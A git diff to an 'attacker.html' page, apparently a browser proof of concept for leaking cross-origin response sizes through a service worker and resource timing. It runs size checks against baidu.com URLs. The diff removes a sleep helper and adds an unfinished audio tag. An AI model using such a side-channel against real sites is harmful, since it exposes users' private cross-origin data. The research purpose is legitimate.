--- a/src/range-serviceworker/attacker.html
+++ b/src/range-serviceworker/attacker.html
@@ -3,11 +3,6 @@
 	<head>
 		<title>Response size leak</title>
 		<script>
-
-      function sleep(ms) {
-        return new Promise(resolve => setTimeout(resolve, ms));
-      }
-
 			if ("serviceWorker" in navigator) {
 				addEventListener("load", async () => {
 					performance.setResourceTimingBufferSize(1337);
@@ -37,7 +32,6 @@
 			}
 			
 			onload = () => {
-        sleep(100);
 				singleSizeCheck("https://www.baidu.com/robots.txt", 1);
         singleSizeCheck("https://www.baidu.com/asdf", 1);
         singleSizeCheck("https://www.baidu.com/robots.txt", 1);
@@ -48,6 +42,7 @@
   </head>
 
   <body>
+    <audio src
   </body>
 
 </html>
